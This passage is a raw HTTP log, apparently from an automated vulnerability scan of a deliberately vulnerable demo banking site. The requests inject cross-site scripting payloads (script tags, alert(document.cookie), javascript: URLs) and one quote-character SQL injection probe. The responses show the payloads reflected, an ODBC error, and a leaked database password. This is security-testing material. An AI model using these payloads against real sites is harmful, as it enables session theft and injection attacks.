<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /forgot2.asp?msg2=no&msg=>"><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:01 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1846
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center">>"><script>alert('XSS')</script></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
GET /login.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 2418
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Log in</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>L O G I N P L E A S E</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Please log in</center></a></b></td></tr>
<FORM ACTION="login1.asp" METHOD="post">
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><TD ALIGN="right"><font face="arial" size="2">e-Mail address: <INPUT TYPE="text" size="20" NAME="login"></INPUT> </TD>
<tr bgcolor=#003388><TD ALIGN="right"><font face="arial" size="2">Password: <INPUT TYPE="password" size="20" NAME="password"></INPUT> </TD>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="javascript:document.forms[0].submit()">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b>No account yet? Please join <a href="join.asp">here</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b>Forgot your password? Click <a href="forgot.asp">here</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
POST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=1"style="background:url(javascript:alert('XSS'))"%20"HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 205
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was 1"style="background:url(javascript:alert('XSS'))" "
</body>
</html>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 178
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=test@<script>alert(document.cookie)</script>.comHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:51 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 434
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = test@<script>alert(document.cookie)</script>.com</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = test@<script>alert(document.cookie)</script>.com</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /join.asp?name=</textarea><script>alert('XSS')</script>&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /backup/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:40 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /join.asp?name=&email=&surname=&house=&street=&address2=</textarea><script>alert('XSS')</script>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:35 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=--><script>alert('XSS')</script>&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:57:02 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 381
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = --><script>alert('XSS')</script></P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /forgot1.asp?get=' HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:05 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 360
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression '[user] = ''''.</font>
<p>
<font face="Arial" size=2>/forgot1.asp</font><font face="Arial" size=2>, line 8</font> GET /linking/link1/link2/link3/index4.htm HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:22 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:09 GMT
ETag: "b8b835fda9dc11:8f6"
Content-Length: 37
<A HREF="./link4/index.htm">Link4</A>GET /plink.asp HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:27 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 164
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = </P>
<P>The parameter "c" = </P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=>"'><img%20src="javascript:alert('XSS')">&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:39 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4013
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /login/login.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 296
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
GET /cookietest/ HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:18 GMT
X-Powered-By: ASP.NET
Location: SetCookies.asp
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /plink.asp?a=b&c=test@<script>alert(document.cookie)</script>.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:50 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 213
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = test@<script>alert(document.cookie)</script>.com</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /login/login.asp?Action=Login&UserName=--><script>alert('XSS')</script>&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:53:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 355
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: --><script>alert('XSS')</script></h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
